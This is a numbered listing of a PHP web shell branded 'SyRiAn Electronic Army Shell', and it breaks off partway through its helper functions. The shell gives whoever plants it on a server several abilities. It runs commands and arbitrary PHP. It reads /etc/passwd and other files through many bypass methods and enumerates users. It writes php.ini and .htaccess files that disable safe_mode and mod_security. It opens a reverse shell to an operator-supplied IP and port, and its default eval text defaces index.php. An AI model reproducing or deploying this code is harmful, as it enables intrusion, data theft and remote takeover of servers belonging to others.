SyRiAn Electronic Army Shell :: SEA Shell

1. <?php
2. # Virtual
3. # users 6 ID /etc/passwd
4.  
5. $user = 'AnonYmous-IQ';
6. $pass = 'AnonYmous-IQ';
7. $uselogin = 1;
8. $sh3llColor = "green";
9.  
10. # MySQL Info ---------
11. $DBhost = "localhost";
12. $DBuser = "root";
13. $DBpass = "root";
14. #---------------------
15. session_start();
16. error_reporting(0);
17. set_magic_quotes_runtime(0);
18. set_time_limit(0);
19. ignore_user_abort(TRUE);
20. ini_restore("safe_mode");
21. ini_restore("open_basedir");
22. ini_set('max_execution_time',0);
23. ini_set('output_buffering',0);
24. ini_set('safe_mode','Off');
25.  
26. // Set Current Directory
27. if(!$_POST && !$_SESSION['curDir']) {
28.     $dir = getcwd();
29.     $_SESSION['curDir'] = $dir;
30. } else if(empty($_POST['curDir'])) {
31.     $dir = $_SESSION['curDir'];
32. } else {
33.     $dir = filter($_POST['curDir']);
34.     $_SESSION['curDir'] = $dir;
35. }
36. // Set Dir Mode
37. if($_GET['dir_mode']) {
38.     $dir_mode = $_GET['dir_mode'];
39.     $_SESSION['dir_mode'] = $dir_mode;
40. } else {
41.     $dir_mode = $_SESSION['dir_mode'];
42. }
43.  
44. // Set Usable Command
45. if($_POST['exe_method']) {
46.     $exec_method = $_POST['exe_method'];
47. } else {
48.     $exec_method = "exec";
49. }
50. # Logout
51. if($_POST['logout']) {
52.     print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
53.     print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
54. }
55. if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
56. if($_GET['info']){phpinfo();}
57. $safeMode = SafeMode();
58. $server = substr($SERVER_SOFTWARE,0,120);
59. $daemon = "";
60. ?>
61. <html>
62. <head>
63. <title>SyRiAn Electronic Army Shell :: SEA Shell</title>
64. <link rel="shortcut icon" href='http://i40.tinypic.com/2rpuped.png' />
65. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
66. <?php echo CSS($sh3llColor); ?>
67.  
68. </head>
69. <body dir='ltr'>
70. <?php
71. # ---------------------------------------#
72. #             Authentication             #
73. #----------------------------------------#
74. if ($uselogin ==1) {
75.     if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
76.         if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
77.         if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
78.             print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
79.         } else {
80.             if($_POST['usrname']){
81.                 print'<script>alert("Go and play in the street man !!");</script>';
82.             }
83. ?>
84. <br><br>
85.             <center><img src="http://i40.tinypic.com/2rpuped.png"><br />
86.             <sy>SyRiAn Electronic Army</sy>
87.             </center><br />
88.             <div align="center">
89.                 <form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
90.                 <input dir="ltr" name="usrname" id="username" value="" type="text"  size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
91.                 <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
92.                 <input type="submit" value=" Login  " name="login" />
93.                 </form>
94.             </div>
95.             <?php
96.             footer();
97.             exit;
98.         }
99.     }
100. }
101. ?>
102. <table cellpadding='0' cellspacing='0' width='100%'>
103.     <tr>
104.         <td width='160'>
105.         <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
106.             <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='http://i40.tinypic.com/2rpuped.png' width='100%' height='100%'></a><br>
107.             <center>SyRiAn Electronic Army
108.             <p></p>
109.                 <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
110.                     <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
111.                     <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
112.                 </select>
113.             </center>
114.       </td>
115.       <td>
116.       <form method="post">
117. <table width='100%' style="border:none; padding:2px;" >
118.     <tr>
119.         <td width='103'>System</td>
120.         <td width="323"><?php echo $os; ?></td>
121.         <td width="90">Apache Modules</td>
122.         <td width="278"><select ><?php
123.         if(function_exists("apache_get_modules")) {
124.             foreach (apache_get_modules() as $module) {
125.                 echo "<option>".$module."</option>";
126.             }
127.         }else {
128.             echo "<option>NONE</option>";
129.         }
130.         ?></select></td>
131.     </tr>
132.     <tr>
133.       <td>uname </td>
134.       <td><a href='http://www.google.com/search?q=<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
135.       <td>Curl</td>
136.       <td><?php echo Curl(); ?></td>
137.     </tr>
138.     <tr>
139.         <td>pwd</td>
140.         <td><?php echo getcwd(); ?></td>
141.         <td>Open Basedir</td>
142.         <td><?php echo openBaseDir(); ?></td>
143.     </tr>
144.     <tr>
145.         <td>whoami</td>
146.         <td><?php echo get_current_user(); ?></td>
147.         <td>Magic_Quotes</td>
148.         <td><?php echo magicQouts(); ?></td>
149.     </tr>
150.         <tr>
151.           <td>Server</td>
152.           <td><?php echo $server; ?></td>
153.           <td>Register Globals</td>
154.           <td><?php echo RegisterGlobals(); ?></td>
155.         </tr>
156.         <tr>
157.           <td>Server Name</td>
158.           <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
159.           <td>Gzip</td>
160.           <td><?php echo Gzip(); ?></td>
161.         </tr>
162.         <tr>
163.           <td>Your IP</td>
164.           <td><?php echo GetRealIP(); ?></td>
165.           <td>Oracle</td>
166.           <td><?php echo Oracle(); ?></td>
167.         </tr>
168.         <tr>
169.           <td>Server IP</td>
170.           <td><a href='http://bing.com/search?q=ip:<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="http://whois.webhosting.info/<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
171.           <td>MSQL</td>
172.           <td><?php echo MSQL(); ?></td>
173.         </tr>
174.         <tr>
175.           <td>PHP Version</td>
176.           <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
177.           <td>MySQL</td>
178.           <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
179.         </tr>
180.         <tr>
181.           <td>Safe Mode</td>
182.           <td><?php echo $safeMode; ?></td>
183.           <td>MySQLi</td>
184.           <td><?php echo MysqlI(); ?></td>
185.         </tr>
186.         <tr>
187.         <td>disable functions</td>
188.         <td><select name="disableFunctions"><?php
189.         $funArray = DisableFunctions();
190.         $funArray = explode(",",$funArray);
191.         sort($funArray);
192.         foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
193.         ?></select>
194.           <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
195.           </td>
196.         <td>MsSQL</td>
197.         <td><?php echo MsSQL(); ?></td>
198.         </tr>
199. </table>
200. &nbsp;   [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
201. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
202. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
203. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
204. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
205. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
206. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
207. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
208. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
209. <input type="submit" name="find_755" id="find_755" value="Find 755" />
210. <br>
211. </form>
212. </table>
213.  
214. <form method="post">
215. <center>
216. <textarea cols="150" rows="20" name="result" >
217. <?php
218. chdir($dir);
219. if($_POST['login'] || !$_POST){echo ScanDirs();}
220. else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
221. else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
222. else if($_POST['UPLOAD_Execute']) {
223.     for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
224.         if($_FILES['uploadfile']['name'][$i] != '') {
225.             if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
226.             else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
227.             if($upload) {echo "The File  ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
228. ";  }
229.             else { echo "The File  ".$_FILES['uploadfile']['name'][$i]."  Can't Be Upload :( !
230. ";}
231.         }
232.     }      
233. }
234. else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
235. else if($_POST['SAVE_Execute']) {
236.     $content = filter($_POST['result']);
237.     if(empty($content)){$content = " ";}
238.     if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
239. }
240. else if($_POST['READ_Execute']) {
241.     $path = urldecode(filter($_POST['READ_Line']));
242.     $file = fopen($path,'r+');
243.     if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path)));  }
244.     else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
245.     else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
246.     else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
247.     else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
248.     else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
249.     else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
250.     else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
251.     else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
252.     else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
253.     else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
254.     else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
255.     else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
256.     else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
257.     else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
258.     else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
259.     else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
260.     else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
261.     else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
262.     else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
263. }
264. else if($_POST['STOP_Execute']) {
265. $genTry = GenerateFile("php.ini","
266. safe_mode = Off
267. disable_functions = NONE
268. safe_mode_gid = OFF
269. open_basedir = OFF");
270.     if($genTry){echo "[+] php.ini Has Been Generated Successfully
271. ";}
272.     else {echo "[-] Failed to generate php.ini file !!
273. ";}
274.    
275.     $genTry = GenerateFile(".htaccess","
276. <IfModule mod_security.c>
277. SecFilterEngine Off
278. SecFilterScanPOST Off
279. SecFilterCheckURLEncoding Off
280. SecFilterCheckCookieFormat Off
281. SecFilterCheckUnicodeEncoding Off
282. SecFilterNormalizeCookies Off
283. </IfModule>
284. <Limit GET POST>
285. order deny,allow
286. deny from all
287. allow from all
288. </Limit>
289. <Limit PUT DELETE>
290. order deny,allow
291. deny from all
292. </Limit>
293. SetEnv PHPRC ".getcwd()."/php.ini
294.     ");
295.     if($genTry){echo "[+] .htaccess Has Been Generated Successfully
296. ";}
297.     else {echo "[-] Failed to generate .htaccess file !!
298. ";}
299. }
300. else if($_POST['CON_Type'] == "socks") {
301.     $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
302.     if($sock < 0){echo "[-] failed to create socket.";}
303.     else {
304.         $result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
305.         if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
306.         else {
307.             $send_var = "\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$";
308.             socket_write($sock, $send_var, strlen($send_var));
309.             while($input = socket_read($sock, 10000)) {
310.                 socket_write($sock, shell_exec($input), 12000);
311.             }
312.         }
313.     }
314. } else if($_POST['CON_Type'] == "fsockopen") {
315.     $ip = filter(trim($_POST['ip']));
316.     $port = filter(trim($_POST['port']));
317.     if (!empty($ip)) {
318.         $con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
319.         if (!$con_fsockopen){
320.             $result = "Error: didnt connect !!!";
321.         } else {
322.             $newLine="\n";          
323.             fputs ($con_fsockopen ,"\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$");
324.             fputs($con_fsockopen , system("uname -a") .$newLine );
325.             fputs($con_fsockopen , system("pwd") .$newLine );
326.             fputs($con_fsockopen , system("id") .$newLine.$newLine );
327.             while(!feof($con_fsockopen)){  
328.                 fputs ($con_fsockopen);
329.                 $one="[$";
330.                 $two="]";
331.                 $result= fgets ($con_fsockopen, 8192);
332.                 $message = $result;
333.                 fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
334.             }
335.             fclose ($con_fsockopen);
336.         }
337.     }
338. }
339. else if($_POST['USERS_1']){echo GetUsers1();}
340. else if($_POST['USERS_2']) {
341.      $array = GetUsers2();
342.      foreach($array as $line)
343.      {echo $line."
344. ";}
345. }
346. else if($_POST['USERS_3']) {
347.      $array = GetUsers3();
348.      foreach($array as $line)
349.      {echo $line."
350. ";}
351. }
352. else if($_POST['USERS_4']) {
353.      $array = GetUsers4();
354.      foreach($array as $line)
355.      {echo $line."
356. ";}
357. } else if($_POST['USERS_5']){echo GetUsers5();}
358. else if($_POST['forbidden_bypass']) {
359.     mkdir("forbidden");
360.     chdir("forbidden");
361.     $forbidden_htaccess = GenerateFile(".htaccess", "
362. DirectoryIndex sea.txt
363. HeaderName sea.txt
364. ReadmeName sea.txt
365. footerName sea.txt
366. ErrorDocument 404 /404.html
367. 404.html = Symlinked sea.txt
368. Options all
369. ForceType text/plain
370. AddType text/plain .php
371. AddType text/plain .html
372. AddHandler server-parsed .php
373. AddHandler txt .php
374.     ");
375.     if($forbidden_htaccess) {
376.         echo "[+] make your symlink as sea.txt in /forbidden/ folder and find the url /forbidden/sea.txt or /forbidden/";
377.     } else {
378.         echo "[-] error with generating .htaccess file.";
379.     }
380. } else if($_POST['find_755']) {
381.     Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
382. }
383. ?></textarea>
384. <?php
385. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
386. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
387. ";}
388. ?>
389. </center></form>
390. <table width='100%'>
391.     <tr valign="top">
392.         <td width='30%'>
393.        <!-- Command Line -->
394.        <form method='POST' enctype="multipart/form-data">
395.             <table height='72' border='0' id='Box' width="100%">
396.               <tr>
397.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
398.                     <td style="background-color:#666;padding-left:10px;">Edit File
399.                     <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
400.               </tr>
401.                 <tr>
402.                   <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
403.                 </tr>
404.             </table>
405.         </form>
406.         <!-- End Of Command Line-->
407.        
408.         </td>
409.         <td width='30%' height='30'>
410.          <!-- Command Line -->
411.          <form method='POST' enctype="multipart/form-data">
412.               <table height='72' border='0' id='Box'>
413.               <tr>
414.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
415.                 <td style="background-color:#666;padding-left:10px;">Command Line
416.                 <?php echo print_exe_method(); ?>
417.                 <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
418.                 </td>
419.             </tr>
420.                 <tr>
421.                   <td height="45" colspan="2">
422.                     <?php echo SelectCommand($os); ?>
423.                     <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
424.                   <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
425.                 </tr>
426.             </table>
427.         </form>
428.         <!-- End Of Command Line-->
429.       </td>
430.         <td width='30%' height='30' valign="top">
431.         <!-- Commands Alias-->
432.         <form method='POST' enctype="multipart/form-data">
433.             <table width='100%' height='72' border='0' id='Box'>
434.               <tr>
435.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
436.                     <td style="background-color:#666;padding-left:10px;">Upload Files             <span style="padding-left:10px;">
437.                       <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
438.                     <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
439.                     </span></td>
440.               </tr>
441.                 <tr>
442.                   <td height="45" colspan="2">
443.                   <input type='file' name='uploadfile[]'>
444.                   <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
445.                 </tr>
446.             </table>
447.         </form>
448.         <!-- End Of Commands Alias-->
449.         </td>
450.     </tr>
451. <tr valign="top">
452.         <td width='30%'>
453.        <!-- Commands Alias-->
454.        <form method='POST' enctype="multipart/form-data">
455.             <table width='100%' height='72' border='0' id='Box'>
456.               <tr>
457.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
458.                     <td style="background-color:#666;padding-left:10px;">PHP Eval                
459.                     <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
460.               </tr>
461.                 <tr>
462.                   <td height="45" colspan="2"><label for="PHP_Line"></label>
463.                   <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
464.     fwrite($file,"Hacked");
465.     fclose($file);';}
466.                 ?>
467.                   </textarea>
468.                   <br></td>
469.               </tr>
470.             </table>
471.         </form>
472.         <!-- End Of Commands Alias-->
473.         </td>
474.         <td width='30%' height='30'>
475.         <!-- Commands Alias-->
476.         <form method='POST' enctype="multipart/form-data">
477.         <table width='100%' height='72' border='0' id='Box'>
478.           <tr>
479.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
480.                 <td style="background-color:#666;padding-left:10px;">Read Files
481.                  
482.                   <select name="READ_Type" >
483.                     <option value="file" >file</option>
484.                     <option value="fgets" >fgets</option>
485.                     <option value="fgetss" >fgetss</option>
486.                     <option value="readfile" >readfile</option>
487.                     <option value="fread" >fread</option>
488.                     <option value="show_source" >show_source</option>
489.                     <option value="file_get_contents" >file_get_contents</option>
490.                     <option value="tempnam" >tempnam</option>
491.                     <option value="copy" >copy</option>
492.                     <option value="symlink" >Symlink</option>
493.                     <option value="mb_send_mail" >mb_send_mail</option>
494.                     <option value="highlight_file" >highlight_file</option>
495.                     <option value="curl" >Curl</option>
496.                     <option value="imap" >Imap</option>
497.                     <option value="mysql" >MySQL</option>
498.                     <option value="mysqli" >MySQLI</option>
499.                     <option value="ioncube">Ion Cube</option>
500.                     <option value="error_log">Error_Log</option>
501.                     <option value="include">Include</option>
502.                     <option value="id" >ID /etc/passwd</option>
503.                   </select>
504.                   <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
505.           </tr>
506.             <tr>
507.               <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
508.           </tr>
509.         </table>
510.         </form>
511.         <!-- End Of Commands Alias-->
512.   </td>
513.         <td width='30%' height='30' valign="top">
514.         <!-- Commands Alias-->
515.         <form method='POST' enctype="multipart/form-data">
516.         <table width='100%' height='72' border='0' id='Box'>
517.           <tr>
518.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
519.                 <td style="background-color:#666;padding-left:10px;">Back Connection
520.                 <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
521.           </tr>
522.             <tr>
523.               <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
524.               <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
525.               <select name="CON_Type" >
526.                 <option value="socks">SOCKS</option>
527.                 <option value="fsockopen">FSOCKOPEN</option>
528.               </select>
529.               </td>
530.             </tr>
531.         </table>
532.         </form>
533.         <!-- End Of Commands Alias-->
534.         </td>
535.     </tr>
536. </table>
537. <?php
538. function IncludeReader($path) {
539.     global $os;
540.     if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
541.     $fileName = substr(strrchr($path,$slash),1);
542.     $includePath = substr($path,0,strpos($path,$fileName,0));
543.     ini_set("include_path",$includePath);
544.     include($fileName);
545. }
546. function GetUsers1() {
547.     return Exe('ls /var/mail');
548. }
549. function GetUsers2() {
550.     $array = array();
551.     $lines = file("/etc/passwd");
552.     foreach($lines as $nr=>$val) {
553.         $str = explode(":",$val);
554.         array_push($array,$str[0]);
555.     }
556.     return $array;
557. }
558. function GetUsers3() {
559.     $array = array();
560.     if ($dh = opendir("/home/"))  {
561.         while (($file = readdir($dh)) !== false)  {
562.             array_push($array,$file);
563.         }
564.         closedir($dh);
565.         return $array;
566.     }
567. }
568. function GetUsers4() {
569.     $dir = "/home/";
570.     $array = array();
571.      if ($dh = opendir($dir)) {
572.         $f = readdir($dh);
573.         while (($f = readdir($dh)) !== false) {
574.             $dh2=opendir($dir."/");
575.             $f2 = readdir($dh2);
576.             while (($f2 = readdir($dh2)) !== false) {
577.                 $f2.="/";
578.                 $dh3=opendir($dir.$f.$f2);
579.                 $f3 = readdir($dh3);
580.                 while (($f3 = readdir($dh3)) !== false) {
581.                     array_push($array,$f3);
582.                 }
583.             }
584.         }
585.         closedir($dh);
586.         return $array;
587.      } 
588. }
589. function GetUsers5(){
590.     return realpath('/etc/passwd');
591. }
592. function ErrorLog($path){
593.     $tempFile = uniqid();
594.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
595.     error_log(file_get_contents($path), 3, $tempFile);
596.     $content = file_get_contents($tempFile);
597.     unlink($tempFile);
598.     return $content;   
599. }
600. function SymlinkF($path) {
601.     $tempFile = uniqid();
602.     if(function_exists('symlink')) {
603.         symlink($path,$tempFile);
604.         $content = file_get_contents($tempFile);
605.         unlink($tempFile);
606.         return $content;
607.     }
608. }
609. function MySQLReader($path) {
610.     global $DBhost,$DBuser,$DBpass;
611.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
612.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
613.     mysql_query("CREATE DATABASE a");
614.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
615.     mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
616.     mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
617.     $result = mysql_query("SELECT a FROM a.a");
618.     while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
619.     mysql_query("DROP DATABASE a");
620. }
621. function MySQLIReader($path) {
622.     global $DBhost,$DBuser,$DBpass;
623.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
624.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
625.     mysql_query("CREATE DATABASE a");
626.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
627.    
628.     function r($fp, &$buf, $len, &$err) {
629.       print fread($fp, $len);
630.     }
631.     $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
632.     $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
633.     $m->set_local_infile_handler("r");
634.     $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
635.     $m->close();
636. }
637. function DBConnect($host,$user,$pass,$db) {
638.     $connect = mysql_pconnect($host,$user,$pass);
639.     if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false;  }
640.     else {
641.         $tryToSelectDB = mysql_select_db($db,$connect);
642.         if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false;      }
643.         else{return true; return $connect;}
644.     }
645. }
646. function ReadId($path) {
647.     for($uid=0;$uid<60000;$uid++) {  
648.         $ara = posix_getpwuid($uid);
649.         if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
650.         }
651.     }
652.     return $content;
653. }
654. function ImapF($path) {
655.     $stream = imap_open($path, "", "");
656.     $str = imap_body($stream, 1);
657.     imap_close($stream);
658.     return $str;
659. }
660. function FileF($path) {
661.     $lines = file($path); foreach($lines as $line){$content .= $line;}
662.     return $content;
663. }
664. function CopyF($path) {
665.     $tempFile = md5(uniqid()).".bb";
666.     copy($path,$tempFile);
667.     $content = file_get_contents($tempFile);
668.     unlink($tempFile);
669.     return $content;
670. }
671. function fgetssF($path) {
672.     while(($line = fgetss($path)) != false){$content .= $line;}
673.     return $content;
674. }
675. function highlightFile($path) {
676.     return highlight_file($path);
677. }
678. function mbSendEmail($path) {
679.     if(function_exists('mb_send_mail')) {
680.         $tempFile = uniqid();
681.         $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
682.         mb_send_mail("[email protected]", NULL, NULL, NULL, $additional_param);
683.         $content = file_get_contents($tempFile);
684.         unlink($tempFile);
685.         return $content;
686.     }
687. }
688. function DeleteFile($fileName) {
689.     global $os;
690.     if(function_exists('unlink'))
691.     {$delete = unlink($fileName);}
692.     if((!$delete) && ($os == 'Windows'))
693.     {$delete = Exe("del $fileName"); }
694.     else if((!$delete) && ($os == 'Linux'))
695.     {$delete = Exe("rm -f $fileName");}
696.     if($delete){return true;}else{return false;}
697. }
698. function CurlFileRead($path) {
699.     $ch = curl_init("file://".$path."\x00".__FILE__);
700.     var_dump(curl_exec($ch));
701. }
702. function FReadF($path) {
703.     $file = fopen($path,'r+'); //Open The File
704.     if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
705.     fclose($file);
706. }
707. function TempnameF($path) {
708.     global $dir;
709.     $temp = tempnam($dir, "cx");
710.     if(copy("compress.zlib://".$path, $temp)) {
711.         $handler = fopen($temp, "r");
712.         $readFile = fread($handler, @filesize($temp));
713.         fclose($handler);
714.         $content .= htmlspecialchars($filename);
715.         $content .= nl2br(htmlspecialchars($readFile));
716.         $content .= htmlspecialchars($filename);
717.         unlink($temp);
718.         return $content;
719.     }  
720. }
721. function Evaluation($eval) {
722.     $eval = str_replace(array("<?php","<?","?>"),"",$eval);
723.     $eval = eval($eval);
724.     if($eval){return true;}else{return false;}
725. }
726. function Oracle() {
727.     if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
728.     else {$oracle = '<font color="green">OFF</font>';}return $oracle;
729. }
730. function MsSQL() {
731.     if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
732.     else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
733. }
734. function MySQL2() {
735.     $mysql_try = function_exists('mysql_connect');
736.     if($mysql_try){$mysql = '<font color="red">ON</font>';}
737.     else {$mysql = '<font color="green">OFF</font>';}return $mysql;
738. }
739. function MSQL() {
740.     if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
741.     else {$mSql = '<font color="green">OFF</font>';}return $mSql;
742. }
743. function MysqlI() {
744.     if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
745.     else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
746. }
747. function Gzip() {
748.     if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
749.     else {$gzip = '<font color="green">OFF</font>';}return $gzip;
750. }
751. function openBaseDir() {
752.     $openBaseDir = ini_get("open_basedir");
753.     if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
754.     else {$openBaseDir = '<font color="red">ON</font>';}   
755.     return $openBaseDir;
756. }
757. function Curl() {
758.     if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
759.     else{$curl = '<font color="green">OFF</font>';}return $curl;
760. }
761. function magicQouts() {
762.     if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
763.     if (empty($mag)){$mag = '<font color="green">OFF</font>';}
764.     else {$mag= '<font color="red">ON</font>';}return $mag;
765. }
766. function SafeMode() {
767.     $safe_mode = ini_get("safe_mode");
768.     if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
